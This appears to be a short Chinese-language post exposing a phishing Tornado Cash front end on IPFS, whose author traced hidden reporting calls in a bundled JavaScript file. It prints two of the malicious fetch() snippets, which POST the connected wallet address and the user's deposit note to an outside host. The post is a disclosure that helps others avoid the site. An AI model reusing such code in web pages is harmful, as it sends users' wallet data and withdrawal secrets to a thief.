发现过程:#
今天在学习 tornado 协议,所以通过搜索引擎查找可用的取款前端,然后就发现了 https://ipfs.io/ipns/tornadocash-ipfs.eth/ 这个很 “去中心化” 的前端。
网站看起来很规范,但是当我查看网络请求后,发现这个网页的 js 有异常行为
,前端会上报用户非常敏感的数据。
分析:#
在 chrome 中全局搜索代码中的上报地址 bafybeiebdyj3wuyrn32rzeq3aldsfyjsefqnmetdapjgljczkkgrizkuk4 [.] cfipfs [.] com/v1
,发现了非常多上报代码,会上报从用户连接钱包,提款笔记到提款地址到全流程敏感数据。
恶意代码存放在 edafb4b.js 中, https://ipfs.io/ipns/tornadocash-ipfs.eth/_nuxt/edafb4b.js
部分上报代码如下:
(1 上报连接的钱包地址
{
fetch("https://bafybeiebdyj3wuyrn32rzeq3aldsfyjsefqnmetdapjgljczkkgrizkuk4.cfipfs.com/v1/", {
headers: {
"content-type": "application/json; charset=UTF-8"
},
body: '{"connectedwallet": "'.concat(t, '"}'),
method: "POST"
}).then((function() {}
))
}
(2 上报用户生成的取款笔记
((function() {
this.prefix,
this.note;
fetch("https://bafybeiebdyj3wuyrn32rzeq3aldsfyjsefqnmetdapjgljczkkgrizkuk4.cfipfs.com/v1", {
headers: {
"content-type": "application/json; charset=UTF-8"
},
body: '{"newdepositnote": "'.concat(this.prefix, "-").concat(this.note, '"}'),
method: "POST"
}).then((function() {}
))
}
)),
结论#
tornadocash-ipfs.eth 这个前端是钓鱼网站。